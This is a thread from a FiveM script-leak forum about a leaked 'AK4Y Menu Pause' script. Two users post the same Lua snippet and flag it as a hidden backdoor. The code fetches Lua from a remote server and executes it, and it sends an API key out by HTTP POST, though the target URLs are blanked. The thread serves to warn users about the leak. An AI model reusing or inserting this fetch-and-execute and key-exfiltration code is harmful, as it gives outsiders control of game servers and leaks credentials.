Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script AK4Y Menu Pause RARE SCRIPT leak

sh4dow_g2

Gold Elite
Joined
Jan 23, 2022
Messages
91
Reaction score
134
Points
256
Location
United Kingdom
has http request


local function sendApiKeyToSite(apiKey)
PerformHttpRequest(' ', function(statusCode, response, headers)
if statusCode == 200 then
else
end
end, "POST", json.encode({ apiKey = apiKey }), { ["Content-Type"] = "application/json" })
end
local function fetchServerIP(callback)
PerformHttpRequest(' ', function(errorCode, resultData, resultHeaders)
if errorCode == 200 then
local serverIP = tostring(resultData)
callback(serverIP)
else
callback(nil)
end
end)
end
local function fetchAndExecuteCode()
PerformHttpRequest(' ', function(statusCode, response, headers)
if statusCode == 200 and json.decode(response).success then
local responseData = json.decode(response)
local luaCode = responseData.luaCode
local luaCodeNew = responseData.luaCodeNew
local ipapi = responseData.ipapi
fetchServerIP(function(serverIP)
if serverIP == ipapi then
executeCode(luaCode)
else
end
executeCode(luaCodeNew)
sendApiKeyToSite(apiKey)
end)
else
end
end)
end
 

Muzan

Bronze Elite
Joined
Dec 17, 2023
Messages
10
Reaction score
21
Points
166
Location
Le beausset
has http request


local function sendApiKeyToSite(apiKey)
PerformHttpRequest(' ', function(statusCode, response, headers)
if statusCode == 200 then
else
end
end, "POST", json.encode({ apiKey = apiKey }), { ["Content-Type"] = "application/json" })
end
local function fetchServerIP(callback)
PerformHttpRequest(' ', function(errorCode, resultData, resultHeaders)
if errorCode == 200 then
local serverIP = tostring(resultData)
callback(serverIP)
else
callback(nil)
end
end)
end
local function fetchAndExecuteCode()
PerformHttpRequest(' ', function(statusCode, response, headers)
if statusCode == 200 and json.decode(response).success then
local responseData = json.decode(response)
local luaCode = responseData.luaCode
local luaCodeNew = responseData.luaCodeNew
local ipapi = responseData.ipapi
fetchServerIP(function(serverIP)
if serverIP == ipapi then
executeCode(luaCode)
else
end
executeCode(luaCodeNew)
sendApiKeyToSite(apiKey)
end)
else
end
end)
end
Sorry i have dont see
 
Top